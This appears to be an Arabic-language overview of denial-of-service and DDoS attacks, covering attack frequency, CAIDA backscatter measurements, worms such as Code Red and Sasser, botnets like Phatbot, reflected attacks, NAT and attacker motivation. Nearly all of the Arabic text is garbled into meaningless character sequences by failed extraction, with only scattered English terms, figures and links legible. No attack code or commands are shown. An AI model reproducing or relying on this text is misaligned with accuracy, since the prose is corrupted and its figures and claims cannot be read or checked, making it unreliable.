Jalaj (jpte-V ^U^alaiJI (Patches) CjUj^>^1 jli t*Uil t(^lSaj^aJl li^J ^a. j^ ^^>*J Q*) <■ axjJall Jallj IgJ (JjjJ ^jSI Sjf^Vl 

4-uIa ^^a-Lua 
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(jl lLu^. tAijjuJlj ^LaJSVl (JJJ^C Jc 'DoS J ^J-^*-* JJ^ ^— ^ cjlxjjlii^ I Lai£ tLjajl .AcLaiJ V AS ' *a» > 

?(DDOS: HYPE OR REALITY) ? t 4J*j <> ^UjaJI 

?DoS 

j£i ^jj i o J t Jj^ill tilli Jj CjLo^JI oIa (Jj > q'i tiljljjaj .<JA<u3l CjLo^JI ^j-d ^Acj t J-gJI ^jJa jl! < - ^illl j * jjoj 

J J ^ J^' DDoS (j* AA JJ3U*1\ Cj^I jaJl ^ AjAxJI Jj AsLjaVL .Jj^aAll liA J Jjj^aliSlI 

,<KjuLa1I CIdjj jll CjUl^JI £>i& Sj^j (jc- 4_ia1c i _ib.nl tilUfc 6<aLa-> ^11 

?(HOW COMMON ARE DDOS ATTACKS) <> OUjaJI ^ j±* U 

IgiV I jlij a jJI cjKjui ^ ajUU ajuU^i DDoS J\ ajj^JI djLajljJI ^ j^il dii^. .Ajill c-lojUj V DDoS 

{survey techniques) CjIusj n > n cjUJiiJI j .4-kLuj ^1 ^ j^JI ^^jVI J ljl^3 ^ f^!^ 

( . u£ a jjj^j 4_SiL<iVI .^-J u^J^ JJ^^^ J^'^ (i j "Shjj^*^^ CjLo^JI * alia a ^1 jjl jLaajl <jalii3l D^Jaill ( ; b 
i 2004 j^j^ J .<-<Jai<i 500 ^j^J ^ <-M* Jj bUloil tA^jjojlaJI j^JI J ^ jiaJI Jl jAiill Cjrqj'q\MI 

CjI c Aj]l£j] ^Lxli JU^.j ^jl^ _*L<i^JI c ^ j^^l (jia^xjll ^ ^ jTi ^JLg ^jLuA I jjlc (jjill ^jjSjLouJI (jji^k ^j-<i L* 

Ac j^a L. CjIa^A j (DDoS) ^ jj - ^^ A-oAiJl L-laL^ CjUl^A (j-lJ (j^flJ V Cjlc^UalajVl J 4^q,^1ui^1 t ■ nil uiVl 

.^j^-VI (j-sajU^iJI j DDoS i— ^ ojjj j Jc CjULiJI 
.MichNet ISP ^^Jl J ^s^jill aL^I J^ jiS ^ Uj^> <«^U ^> Farnam Jahanian 6 J° 

jl<i Jc Sjj laj a j Ia^. AjuLuj DDoS ^jl Jj j;!^ jll CjULnl! ^a^Ij Jahanian c3^j^ ^ t<cLuJ! jIa^ Jc ,<Sja3I 

,^cjlli3l (j^asu 4_ilasu3 ^jiajc. tilliA ttilli j Jahanian 2^^-" ^ j 
CAIDA .^j^V^ ls* DDoS Ajt-iila j jl uml J ja. CjUj jls^xJI ^jc JVa1uj!)1! A-ualll <JjLujj t fllla a ^jc ^jjia-LJI ^ ^ac 

J^ 4 ({^/i^ Cooperative Association for Internet Data Analysis} ^jj^Vl ^UUj JJa^l 4_ijjUj3l Aj**aJ!) 
t>» 4^000 2001 ^ J (^bjjl aj^Ij saaI ajSI^JI Sjla ^uHill jjj^j clip, .backscatter c^-^ ^.^">»n 

.dijj^VI ^ J^ ^ jf-jVl J DDoS 
000 * CAIDA 4^ Jl J Jj j^i l^jl J^ U j^i ^ Jahanian gftti .^IjJI c> JSi a£U3U ^ CAIDA ^ jl «uU s^J 

.2001 ^ iio l^jjJi r^n^l DDoS uL^a J\ ^yJ CjUUj ji& tcilli J^ s .DDoS 
CjU^a ^ix^ jl Jj Jahanian j CAIDA l^-^ Jll ^Vl ^>JI ^ 6 ^ DDoS ^j 

J (JSajj Cj^I jaJl jxi AjAslSI jl (jlaxJl (J^Sj J ,QJJ> ^ dil Jil (<JH<J! cJ^f^ J^ t^J^ixJl diVl) IjUnl o jjir > ^> L_fllAAl AjJa (3^^ DDoS 
( ■ UjujJ ^Jl (j^J / Uo^l Jc ^ j3 ^IHLujI (^\ Jj <Jj^ jlill Jc lAa. A J^-J (j* ^C. Jl Jc 4<jIaxJ! ^ - a3U jj^f \ 

oAa! <jLaJLuj| ^1 JIjj Vj -!ajlj Jc- ^AaJLaixJI jSjj UiAjc .^5^)^.1 a£jjoi J Jlk tilLiA q\ laj] DDoS r* ^ jj 1 
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Jc- 64^1x11 J ^L^j jl (J^Lulxi <ilU& ^ji jl J jxjuLq ^ILJI ^jj ^clILudj (jl ^^.j>JI (j* 4(jjli}| j» ^SjSa 

^| l^S^^lj J jj^ c> ^ DDoS CjVUJI c> jiS J 4 1 2£aj .DDoS ^ i> JW (^LkJI 

^ ^Ijloj ±*te> i^IUa tVjl ?4 K mi « U jjlu jl Jll 4_p^l ls^-a La 'DDoS ^-jL^JI (j* aja*]| ciiSa^V J^> <j£3 lil 
^ji t^Lijliill .^LalgJI ^1 J *L<»^JI lP^j ^ cs-^ cr^^ DDoS ^ ^j^j ^jj cjLg^JI jl j-aluil (j>* s jjL3l cj^I j^JI 

ASlIjI A Ltij (jl (J^-gj La (JjjJj 4<J ^aLill ^Ig-xJl ^1 jl La li& (jV S^jJj^aSj S^ii-k^a (JJ^J La S^lc S^)Jj^as3lj D^ii-j^all CjLa^gJl (jl 
A ^ t ^ j]| (jxj £A^J (jj-a^lg-xJl ^US > nj (j£-GJj .^OjuUi ^)JC. (J^j <J^« LaJj jl tdjlcLuJ JzJb ^AluiJ (jl (j^-GJ DDoS 

.Ajjj-g^j (jlaljC-V JjojI j (jUaj Jc Ifrxl.V^ UhI ^jjI J^l ^iUl j& Jii La dlli j AA JJ*-* <J*-^L djUj^J 

DDOS f*» 

J jl Ia^J jh ^jki Jll ^^>^ J 4-ui\j& (J^-gj ^ j^-ll ^ 3^ DDoS ^ l>^^ * ^>^l 

.DoS <*-JjLj ^ jll CAjoiI jJI (J^asu 4^joj (JjjUj (jl L^ajl (j^J _^ j^^^ ^ 4^jLauJ! gl\ 

4.5 j 4999 flc ^ f ^ jj^il u^ 1 ^ Shaft attack tool sbVl ^ V^^i ^l^V 1 J^ 31 
MultiRouter Traffic Grapher (MRTG) .^jll c> 100 Jlj^ t> <^ ^^IjJ^j^ ^1^1 ^ c^U^ 
J| j^kj Cjj^a S^jl jll jj^all ^^>^ j^-^ cJ^I 4 V^(pHidti j>JI (j-<i ^-jji^ Jc elm dii^. 2001 j^-a ^^-S*^ ^ u^^^ 

. jj^Sj (JSI Jc JjSJ dlaJ ^jailo cJ^^ (J^^^^ CjlAsLxi ^jl Jl tilli ^^.jjj .^1531 J Clul ab^o 25 

Jl Jj^a!i ciiLajuj Jl jIojVI Uecomm ^5^* r* 4 C5 jJaL^ll J 4_x_jujI j Cj!>L^a j ^ Cj^kjl jll DDoS jLl^a 
.pps 200^000 J\ 100*000 c> J£ Ji; <2002 ^ <^ ^J^ 1 DNS H ( > c> ^ cr 131 ^1 ^ .pps 600*000 
cjUbi j ^ j^Ji j ^l^ SI cJUbi dii^ 42003 ^ J (Al-Jazeera attack) s jj>JI ^Ua J^ ^ j^JI Jl* ^cjVUJI o^s? 

(jli JUlUj 66JjJjJa3l Aic J^JI 6 j5 *^Uj J^JUdJ ^ j£ <LJ (jj^^l A\ (jl Jc (J^J li^ . Jjj-oll ^^>^- ^ (J-dlxjll Jc 6J^3l (jjixalAxJl 
(j-G ^jAslSI jll J .^3jJ (jl (j£-<uJl (jxi (_^i3l > <a3VI ^aJl (j* jj£l L_J jlla^ La ^.1^>JI <J ^>*jaiJ ^ j^^l JJ^la-a u^M* 

dlS j J ^ Lq J£ ^jJafl ^AaJ (illi j ^^Jl <iajoj jILq ^ <L^il<Jl CjI^JjoJI (j-o <C j-o^q du^Jjoal ^J^jll *L^. j Jc CjUl^JI 
(j£-dJ J-g ^xilajul ^-!aJJ ^ t * 0 /^*^ ^13^ (j-a V^J ^lj ( --^J J ^^jl j-d <j£ ^I^JjujI J L_flljjujVI l^kj>» (jj-^l^xJl (jxi J;J^I ^i*J 

jll L^l jlLoal <^l J ^a j^-I! Jc ialLaJI 

Jl ^jjj ^ ^ill ^31 ^j^3l o^*-? olc^l .CjU^JI jj^j Liajl CAIDA 1 <p* v^J Jll backscatter ^ 

q fl>^JI djlcli^j 4<^^pJl ^ jjj 4t * a ^^ ^Ij^ (^C- bL^Jcl . jS&l jl ppS 350 (j^ L . L "^^ V Jll CIjIa^JI t L^aJ 6(jjj^i3l 

Jc^ .6^.1 jll AjjIjII J ^a jaJI (j^ lJVVI CjUx CAIDA IplTnJ jj£I .<^^kj| (jUj^J Ual£ JjSj U ^aJl liA j 

Jl U cits SCO ^LiL (jl CAIDA ^ ^ *2003 ^ SCO ^ TCP SYN Flood J 4 

I j^IS .d jj^ J ^Loj 32 J^ ^ j^a J ^aj^JI t> uj^ 700 c> ^ L» ^ J>»Uj3I j 6^1 j ^ pps 50*000 

t L^aj 4jjLoxi 66LaJl J£ J CljjljVI Jc JjJ-a3! (j^ / dylxJx 20 (j -0 Li" pps 50*000 6 JJ^ 3 ^ J^x-^l L_jLud^J 

."(^ / c^U^ 45 Jl^) DS3 ^ Sj^ 

(jxi ^jJaJJj .LA Jl tgJ JL3 Jjll^J L-Jxj^a l J^ L— ilg.1 > ^i^VI (jU 4^a j^A J liljLujj Jll CjVVI Jl Jaill (jxi 

2*200 c> c> DDoS f jl 4 1999 ^ J J jVI DDoS CjL^ c> yr^ 6 ^ <«^L^ 

.IP SpOOfing ^Vi"Q ^a J^JI (jV ^^Vl ^Jl Ai^SLxi ^aJ ^3 .jaflS liJ j^. JVI J^l < * Q J^ 4-^LojI ^al^klajU A aW)\ 

u^-a DDoS ^ Cik^ jl jll IP (jjjLc; ^L^a^l 4 IP Spoofing JL^I u-* ^^^^ J^l CjL^JI (jiasu 

.4_nsLxJl S*xl\ ^ jL^ cJ^^ ^-^a jJ A jjuj l^-jli 

^ ^ .pps 679*000 uj^ J CAIDA e j^JI Ja^ j£I jaS .ia j^LJI (> cjVVI ^ J^ JVil,^U >l ^ <^ 
.a£jJo31j JL^ajVI j 4Aj j£^<JI ^JIslaII j <c jjoj tilli J Iaj i J*\ jc Sac Jc aaIsu Sa^.1 jll 3_ijLi3l J <UV1 IaaI jj (jl (j^j Jll ^3^1 
^ <j| lUajjal j] j^ .^j^ C5 A-flSV mj^' J^- pps 20*000 ^ *^j^VI J] A^Lill J c^U^ 10 Cj^a j ^ cjVVI 

^ .^Ua ciiVVI (>« 40 30 iXV! J^ ajV (jl^ 46 j$A.Vt 6^ c> ^ j>^^ JjS (j-d CAIDA <iSa^V Aa ^ill j ^ jj£I Mku 

t^iJa jjoj cjli CijjjjVI CjILiUjjI I^jJ 6j^Vl c> 90 J^Vl Jc^ ajV jl£ 46^1 ojj^aJI DNS ^ 

^!>l£ jll ^ia^. duA^jjail lil 6(JHa3I ^J-ijjuo Jc .CjVaslaII (jj'q^M ^ Lo j;i^l ^LL^j <jla j£ CjWI ^1,^1 ml <JL^. J (jj^jm j 
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Jjujjj dii^. '[Reflected attacks) <^x j u o!\ cjU^JI J _^IS jVI ^ jjj ^ jVI J^ j& ^ I^a J A- ^vim^ l lW J*^t 

^J-s > ^aJ Jl (_£-^JJ lA JJ^J <jJl J 6^JIsl!I e-L^Jl <J <C j^)juuJI ^1 (j-a 1^ (J- 0 (J' 1 ^* n (jl! j f ^3^" & ^ 

Jc I jjlS Jl jj V jl£ u^j i> ^ ^ Jc- futuresite.register.com ^ ^ 

.AjauJaJI j^V ^1511 J ciaj jjAft 90-60 ^ 

.DDoS ? J j 31 J^ cl^ 1 * j* 1 ' JpL-oj J 

Ifral.Wimt j Asu (jc t^j^Vt 6J^Vl ^Viml 1$jU tiilli (j* V^j jS jll Aj jj j] AjLi c*Ui jV 'DDoS (J^V 

ttilli j .DDoS ^^g^ ojjjn^ (j-a A^j (J-dlx]| li& (jli t^jjoJl s-l^ill t . illaJJ A )-* > ^> A_iLoC Aisu jig-?* Jc- A_x* jLauJl lij ,^ j^^l (jjuJ 

. DDoS^W^ ti^V U-^ ^ M1 1 J^ j jSI j^h u^-^l J AlUi aJUJI djluiill ajj^JI £sl&\ 

^ 9.5 ^W-^ i qjhvil l^l^kiojlj I^L^j MSBlast cleanup jj^-* ^ ^-^1 

.Uj^juS aS jja^SI jjjjU^I s ^ uj^ 1 c^'j^ c> M ^ '2004 Jjjj^ 2003 u > l ^ M1 ^ ^ c> s 
Jaj|^)ll ^1 ^>lajl ajU^xJI Sasscr 2 cJj^- 1 dulS U^Jl 2004 ^ j^jj^^ t * >i<< ^-' 

http://www.securityfocus.com/news/8573 : J^i' 
.< \u'^a 400^000 c> <*u^ ^Wiil ^j.n cj^a^ aS ^1 l^sli jjjli^l 

U^^ Phatbot. Phatbot c5 j^? <^ ^L>^ IP ojj^ uj^ 2 c^j 1 Ij^li l^ljA ^ a£^J! J jl^ - 

.<j j^Vl cj^U c> 'MyDoom- and Bagel u^^ 1 ^^ u ^J > ?n ^ ^l^J ^1 

auto-rooters J 'automated infection toolkits ti^ s^'j^' 6 ^ i> s^l^V A^aj^ ^ ^1 djVVI 

^Jc. (J jj^^Jl jl CjV jUj ^A* 5 Ajj^l jail ^jli 4^jja£jjJ A_xJail ^^ic ^Uaill (Jjjjabd L-jLud^J ^jojI^ TOOt ^ laJLu^l AsU^ 

L_a*_jJa3! Jalij (J^ujjjI 1 lil Lujuj Vj i A L« - tall CjVI f^J' JJ^* 3 ^ ^^■^ UJ^ ^ '("Ajtij^ Cj| jUldl 

.(patches) cj U^^N ^ja jc^ JS1 ^ ^1 Ijja^ Aij^iUI 
A^xijJI a! A^uaij ^ l^ift c_iL^ajj c axjjal) Jallj djli diai n ^Ujj ?ciujS3V( sa Ultimate in automation 

/*iIAja3I Aj Aj^aUJ) 

^ j^a iiiiil (Code Red) *1><^J1 ojii^l a j£ ^^>^>i ^3 c JIU! JjUjoj .DDoS f m^j^ ^ j^*^^ (worm) 

c> 250'000 c> jj^I <jl->-al <^ (Code Red) Sji^JI jjS c^aJ .(jj*- IP Jiyc ^S*JI DDoS 

Sasser .oVVl 6- 500'000 cUy U (Corfe /ferf//) II *l j-aJI s j^JI ^> ji^l' 

^DDOS ^lA^i 4^ajP ^ 

< aj< (jAill (^jU jl JIjjoJ! jli tCijjijyi ^al lP 3 *^ Iaja^j DDoS eft <J^ t " 1 ^ 

jl ^j^dj DDoS f .DDoS ^ j?^ ^ o lijiA tSbli tdijliVI a£l^ ^1*3 ^ ^ n t ^ li! ajI ^a 3 k^ull 4j^VI 

CjUiAk ^^aLg j 6 6 jjt > .oil j DjjiJ^ll CjI^jjoJI .A^^li (jj^J (jl ^^.^<JI (j-<^ tAjli^ll Aj3 Iaj ^ j3 ^ j^A lilj cJP q\ jic ^\ c V^lun 

LaK .DDoS r* J ^ ♦J^" ^ UJ^ ^ U^^^ ^^J^ L>^ J^Vl J^-J tCjl^JjaJl Jc AxUSU A^ J^JI djLaUuJ^Jlj dljjljVI 

.ALjL Sjja ikL DDoS f J?g^ C5^^ JJ^-^ ^' J t^ouaj^Jl J Ciijl^U *\ Ikl^l 

A-iLaixj3l ^^>^ J^ ajIa^JI jl£juj| <J£joi (_^l jl 6(_^jU jIa^JI 'NAT (jjAi^ ^Ijj (j >i ^j ^jW^- ^j 

jj^Jl L_ fljjj jl o^lcl 4 j£ aJ jJalxJl a^I g all .IjJaJ DDoS (>< ^ AjJajC Jl JJ V (jj^J ^ ttilli Jj 6jjaiLlx» l^-l^ jJ ^aJJ (jl 

jl^. jl AjLo^JI jlA^. 6 NAT (jj'Vu in J^j Aiajoal A^Akll (jia3^)3 tiLia^su jJujU>» J» ^ (j^al^Jl ftAflC- Jl L-lAAj (jl ( . LaJ jll 

Ail£ .a£jj^3I Jl ajIj^ Ja*j ajU^JI jIa^ ajAj < Luiax (Network Address Translation) NAT. 4£jj^3I aL^j j] a^jjII 
l! oJ» ^ ■^^> a3 ^ ^ J j^ 3 ^ iiLujI ^jj J^^j Ia jAj^-g (jjjUc l^Jj NAT l5^^ 4£jjoJI (iljii jll ^3^^ 
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clA^ NAT /<^i J^b Jig a 1] L-bujliJi jl jixJ! NAT <y>* u' JI^jIujI ^jj f J^l ^^l 

NAT^O* <j' L5 > J O^^J^^ .Vs nnrtti £>l jj ^ilt \]^> jll (jl ji*Jl ^^^IkUl 1 g KjA ^li^-V aSjJJI 

(J^axJ £)) (jj^> ^ a J^Jl li& (j-<* cilljl aaJ ^ajflJ L_fl jjoj SjjjjJalb (jjdJ A^JjuJI Sjblj (j-aVI ^aUaj tULbuj liu^U Lo£ 6tiI3i ^^ic 

/ajJJ^ll ClAjLjajill CA a^frj AjJajC Jl Jj V <^1*3 j-a ^ flxjJall Jatfij Clil A-LaJjoi CjI *s!>L^VI 

djULja^ CjLa^a (j>» ^jAxJI (j-a ciljjl ^ Sjsl jll ^Ikjl ftj^S cJ^ 1 (jg& ^ (He uvy provisioning) A V° *^ 1 ^ &1I 

cjVI ^lg-«JI ^ li] < jMI c jSai l^^j ^1 SjjSll aj*31 j a_l<£ ^1 .t*L <j^aUJl AjL^Ji ji-oj V jSl j <DDoS 

.<jjiU> JSl la^A ^ILcaJ j DDoS lP 3 ^*^ J <^ I Aj ^USII «j ^L^l <t*lb x-aj .ciiJa a_* ^» - ^ A_ial£ 

^ jjjjl jl Ia£a ^1 j jjill <jj^al jail JjS ^ ^ j^JI jIsuIoj! ^Loij (Heavy provisioning) aL£j3I Cjh^^vill 

jUojVI (jc- jjll .L^xjJall Jalaj A-ajtl3l diU^Jl £Ojj I^jV ^LuiJ c flg > Sail Jatfj (jplcl .^ijj^aJ dl^J Jj£ jll CjVI 

Jjj^ilill oi^ ^jjjabj jjoj ,*L<i^Jl u^a ^ y*Jt> t * a J°^*^ Igjbjj (j-a 4Jbi dibL^jjaa! biajlj jjjxj] lAiL^jV 4jbr> 

,<Lbjj <J jj^a 

£a j^-jj a x-lfla ^jc. (jjiaLalAAll Ai^x-d ^^^J l^Jt-d J^IxjII L-Jau gall ^ ^aJ ^^jll (_^^)J^3l dljjijyi ^1 j>» (^^ic 6 jjbll Cjb^gJ! (J^asu 

(jp» ^lak ^ uj^ ^-f^ 1 A_k^LkJI ^jl (j>» CijjljVl jii jl j-gIujI (^ic Axusu el n£ bj .aJc ^j^l dja jll (j>» c«y^l 

(j>» ^^C lllaJL ^ajL 6^lc (jU 4^ DDoS ^ ^-H^J^ till ( ■ UjujJ ^3 DDoS (j-d Ijj^aJC tilb^ 

<jj (jj£j V ^blb ^ill ^ ^aUJI ^jl U j£ tiljU^j jjoj tiljla Jl j^Vl (jjud^l ^ i\ aqjii tiljl^ jl£ bli .CjVVI 

(jj£j ^3 (iL <j^al_iJl Ajjji^Jl CjbbJl jl c^Lq j^A ^ jl jjJaVI (J^axJ (jc bjj^- V jjjuo-q ciLiiij i Jl j^VI I jjoj I ^ ,till<i <j^L-^q 

.(j^^>^^l cf^* DDoS i— ibi^A f.bl (_3^^>ia (jc J jj^^JI ^ (jj^^l ^ <^l A^jS t ** iqq^ ^ jj (_^i3l ^.l^xJl <Jj3 (j-d <ilb jl Ai jj^-<* 

AjJajC jj£I ^il jlfraJI (jl (^^-ixj bA j tjj^ jll CjVI (j-« ^ CjSj ^1 (j-d (jjiijjJaxJl (j>» j^S ^)j£l lil^j] 1 > J jj£I (jj>i^)^xJl 

<C5 ^,jLk ^jia J^ (j^ < ^i c ' £^blLoj^U 



DDoSj DoS ©j^ 10.3 



(^jl! CjI^.VI (jc !)ljJaa 1 1 ^ * j o - ^^bx»j Cijjlj^U ^ji^jjbll L_ij| j^JI ^1 bUloal t^^JI (j>» (jUi^pJI (jjjaUj l_a jjoj J- gaall b^ 

.(jj^^l ^ ^11 j CljjljVI ^ (j-« J^ J^l l^al J jJl 'W^-J^ 1 J ^-^J^V^ J -0 *^J^^^ DDoS ^bi^A ^1 dj^l 

lotivation) gil. 

VI^jujI i^jj (jl (j^j ^Ijj^II b^ ,^Ijj^3Ij L_a!)tkj! ^ j^-j (j-« ^ tlx^ (JjjUII (j>» CjIc a ^^ic J jj^^JI Aic 4Jl (jLudjVI Ajt-nJa (j^ 

laJ ^1 ^Jl ~\ Iklual 6 

Jsc^J jUJl (jlj^- J^^l ( ; ^ 4 ^ (j^akjaJ CjljUaVI (J^aik ;<il3i (j-d I jjujI JL^cI jl AjjouIU 4i£-<uJl jUl^VI dil > ^ - gaS) 

fiiA J^ tCj^J Lo£ , JJ^JI AJSjCj L_lStjaJl t . UjujJ Uui ^jl JJaJl ^ jl <-dlc 4 ^1 UJ ^ JUJl (j>» A-dJ^. 'J-^l (j^ cJ^^ ^Ijbjuall 

.AjjJaUll 4Jl<»Vl ^ t JSjSI Jjb- j c> u^j^^ j 'DDoS c> f^^^ Aj^UJI JliuiVl ^ULaVl 

J jl£ Usenet (newsgroups) jW^I .^Ij^^ ^-^1 ^f^ 3 ! t^jAUa ^Ui^l (jt£-a£ djjjjVI aj^x^ c-iW^I U£ 

S-Ljacl (jjj p^(gMl ^xj ^^(glll (j-a Aj^jIaII diljl j^Jb AliLd AloiLoi ^ilkjJ (jl (j£-<uJl (j-d j AjLuHaH ^31 > dib (JjjUII x-<^j ^^^1 
^jb^a ^^^^jj (j?l ^(JIjjuj (JLujJ tLa (j^akjuj ^jujI be 1 Vi > 0 ^ tAjjJaJ^^J ClA^J^j aJJ ^V^VIj L_jlAi3b ^j^J ^ailalb ^)t_>.7ij uj jl _A£. j^^ aII 

-( ^jjjj^3yi ^^>^l jl jW^*^l ^ AjbL^xJl iaUa^Jlj A A^lLa L_Jj^)^. IAaC ( . UjujJJ (jl (j^xuJl (j>i ^^Ij ^ J^ 3 J-^l (JC- ^J^- 

(jl < . la>Jj (J-^l ^^>^ dlJl" "jb^ I jSSjl" C5^JJ^V^ ^^)^^ cJ^l^J £y* 'dbxi Jj tdiljjaic. ( . lJjujj (jl (j^J (j^akjaJl 



a j£j (jl Ajjjoj A^j^J J>^i^J tdlVl^Jl (J^axJ ^ Ac j^t- a (j^ (j^*^ ui ^)^^ (j^^ V "tAc g1\ d^A <-^^)jj 



https://www.facebook.com/tibea2004 
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(Jjjja jc (J^.I^JJ La Ic ^illj DoS L)^ (Jajuj ^ I— U laJI j^A^J (J^-uiJ <C j ^ all <-^^Aj ^I^jujVI S-l-*-^ (JjAjII 

_Lq £(^±1 ^aLaJI j-a jj jjj^^l ^ 



ijljixj Phillips j Suler ^ JJ> ^ 

"77/£ Bad Boys of Cyberspace: Deviant Behavior in Online Multimedia Communities and Strategies for Managing " 
http://users.rider.edu/-suler/psycyber/badboys.html t> £^VI Jllj 1998 ^ 

LaLaJ 4 qVl^ a <LjaJ jUa*.VI (J^a*J J L-flj > <aJJ jl j£-<uJl j-a <jjjU3I jl cTnj L_ .dljjljVI Jc ^Ld^JjaixJl jc <jujIj^ Clq^ jll j 
jjjuoij ^jaij Jfl tgij t*1J«s m <^. j] lg_a. j (jjjUll £A <Jcli!i3l Aic La (Jjj^C Jc dljjljVl J <J-gIxj31 ,AjC i4jc! al^l JJC <L JaJ LJlc j 

l— lAaJL jl£ jl j-a L-bJasJ! J ^ 1> gaJ jl j£\*Jj . JjLiuJl jl (Jj> gal J| jjj£iL jl ^ g 9 ^JaaJl jjsilll I^jV ^UjujVI 

a La jc t ftjuj^ll ^a^C .^£1 ft j^J (JclijJ ^ 4ilj L— l^aJjj c£^l (j^akjuJl AjjJ 

_4_L^aJ Ja-aJ Vj ^)JC I^jU jJ^)i».VI j-LaAaJLud^l (Jj-aJ ^jll jj>^)Jl jl jj^ ^"^JJ j Jj^t_ui3l 

jl j£-aJ J^lj tA-jljj^Jl L-fl^sJl <Jj>» LaLaJ jj^J djjljVI <Sjjuj Jc <juj^j^3l L_ fljC Jl jj Jaii ^jjjUII (J^axJ jl Cilia a 4 a * Uo^i 

<j^aLa Ai^c. tgJ ^Li^jj Jill <j£jjI Jc- ^j'^Vj A-^V uj^^ os^^y* uj^*-^ ^ f^^j ^^-^-^1 J^ (>< ^ 

^jjj^itill ^j-<i ^JlxJI Jlkj La£ UiLdj 6^ jll ^j-<i jjj ^cilli J £ix^J! jj ^>^-VI ^llxJI L— Lia Uiia j jii jjj^ti lS^*-^ ^ ^i£-<»jj 

Jl (jjLa^Sl! ^j^i^^l ^ L^flj Ullc. j ^Ijj^all /Ml Qli ^.JJ <jl ^aJ Cilia t^^UJl ^aJUJl J li^ (JjJ^C Jc .lU*^I (JC- Aic 

4_a. jl ^5 jjoj V .A-nx>Jl L_fll Ja!>l! J jjujVI (jj>Hua3l JxilU Jill laJ > o jll a£jjoi ^ ^jl^-o ^1 jj^ll ia^U dljjljyi J 4(jj<vV^I (j^^^l 

^^UJI 4-jj^3l (jjli^JI li^ ,L_fljj^i3l <-iaj£ J ^A^Lujjy Ia^L<» JSU 4_jjisLxJlj 4_jS!>L2t.VI JaVlj l (j uj <J£ ^U»l A-uiLuij ^jjILJI 

Jill dljjjjV I ^jl jij iaSS jj aJ^ o ^jli ttilli ^j-d .djjijVI A£jjoi J CjVlj^iVI jau (jj>u^J V c^-r*-^ J*^\ Uj/^ ^ (j^^JjaixJl 

(Jj - gal 9j3 gailll Ai^sLxJl (illj U^ 1 ^^ ^^J^ .^—^J^V^ ^.^J 1 CjLd^iJl jl 4_ijjjjSUVI SjlaCil! JLd j3 jJJ 

jj J ja.^ Jl Cj^I Jll 5Jaljl| ^ d^A .oji^ A LLiiJ IjjT.uij jjill (jJjiJbll CjUi^kll Ajllsti J^J ^ » n > » V 4_ilc ^-IlicVI clA^ <SjJo1I 

.^Ul J\ DDoS 

t4_joi^j^3l L_fljC. j jlikVl CjIc j-^awd (JiLd JIj^jVI djLiJT ^ dljjljVI J A-d.liJl l-la^ CjLa^A CllSaJJjl ^3 ( . ill *\\ J t^jjnnti j-o Jc 

^jlj L_iiij!i3l jLa. J jLi (jl (j^j (JjLoj^)3I ^jli tl^ <uLuii <J> .^^j LdAjc j jjii^lVI ^^>JI > ^ <J> ^n^j . Jj^aJI cjS jll J Aj^L^g c^IUa 
^j£-<»j t J jjli^3VI -^>J1 j' ^ j^ 3 J jW^-*^^ cijlc ^ JiLd tdijjljVI J (j-<il jl<i j;i*JI J^^VI djLill .^JUI ^ ^ 

> nj La Aa. Jl (j£-<»Jj JjoiU^ UJ-^ *^ 6 ^ J>(S^ '^3^ L^^J ^ CjliLjajil! jl Au^alll JjS ^j-d \ folic j^(g\l 

^UiVI Jc J»^j V ^Ifo^l Jl^Wj < jjc ^ ^ JL^iVI djUiT jl j . jj^UII Jja (> l^j^ Jxixj]! 

,^jji3l Lja^)3l j3 jj V t^^kl ^Li^lj 4<J^-<» jjc JJJ>JI ^^>^ ^ dA£djoi]| jl CjLdlLJl JiaxJ t . ujujj ^j]| 4^»^aJ| L-JLa^a djLftakA 

(JjJafll lS^*^ lS-**^ ^->^1 ^^1 jc Lja^)ll j AJlxill j-d Ajjj tl'qjui^ ^.^foi ^ 4 \a > >i ^ lilj t^Uaill Jc JjoiU^ lS^*^ J^jH 

# L_JJj3I ^^La. j ^ij^l<Jl jJJ dj^lclilill j-d *UjJa <LaAjuj jxuJali jll JjjaJl ^JJjll iaLaU jl <juj^j^3l (Jio 6 j-dl jlxJl JIj^jVI lS^^ J J^ 

^j^i cjli j jjjS^I ^jjj Vjl lUjj ^ l^jli tlia. ^jaCil tNotARealSiteForPuppies.com pI^j) ^' J «Jl^ll lW^ J^ 

Jc Jj^aaJ Ja» JallJ "CjIcLuj SAaI IqU a AixaJ tiL ^j^alaJl L_LjJI £fl ^ ikl Jl L_iAli Ulj !(JjjU3I <!Ha. dljl" | Jc ^aJJ jllj 

.<J dj^Cj jll ja.foSl Jjill Jc )AJJ ^aJ ^(jjjjal^ L-jLuli. ^a».jVI J^-) <!LaJj3l J^J^ (5^^ L_)LaiaJ! jC ISP ^ ^ ^jll 

jdj jaj) "Timeout connecting to server" jjjlli (j jjj t J**j ^jjjII ^i^a ciul£ lil U <i JiaJj 

Usenet J jW^^' (>» ^(IRC) dujjjyi j^c ^^j^ll a^^j jjc l-jUVi j-aljiall JL-a2VI 

Jc jJujU-<» <J^-^ J^J^ ^ ^ * L>^ . JjujL>JI J^Lill 11a < . UjudJ <-<i^iJl uaA CA <^^J jjjJa^suj Lq Ullc t4_j^j^)Jl ^ajl j^3lj 

CjLaa^Jl £>i& ^foij jl ^-<JI jxi .lg-La£\j IRC 4£l±ui (JjIaxJ Uiajl jS\3 j ^IRC L - J ^ L>^ J J^^^ 4 ♦ 1 » M1 >> ^AaJLaLQ 

pUjojVI ^SL J jt s^jJI fiL ia^a Jjli^ <JUi CjUiill j CjI j^Vl jV (IRC ^ ^ v^»»n V jl J^) 

Jl ^ J (DNS) c^J^^ 
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<.v>^ CjU^a .1990 J J 'lAu^ <c>VI 9>\j^ c> 4i jjx-Q IRC J^ J jVl CjU^JI 

.(dUS cilLj ^ill <> jLa^ jl^a t^t) IRC ^1 Jl <TCP RST Flood J& Jllj <4-^l 

(j-a ^^cjjoJI tillLall ^ j > nVi (J) Ala 64_juj^j^3l djl jja (j-a jj£I jl ^.1 j tilLoj ^jj ^ni Aaa taUall aifc J ^qn^l Aia* jll 4i j£ tA^ul) ^AaJLoiall 
Aj j-a Jj A3 (_£All ^Vl '4_g_^.l f^-^ J^*-^ J OSP' L-jLau> ^nVI i^^] t>^y* CjI^JjoJI ^ajJaJJ LaAjc .4jK <^l a£jjoJI 

Jc 4jJJJ*.| <J^ J^ 5Jl*i 4jjjal j 64_ju1,JjA3I dj| jjS (j-G ^a£J L_Ua.J^ J^*-^ (JJyiA^JjulxJl <Ul jV ^^1 (jUaill 4jLjoll J CjLttaA Ci^A^JjojI .^ataliVl (J* 

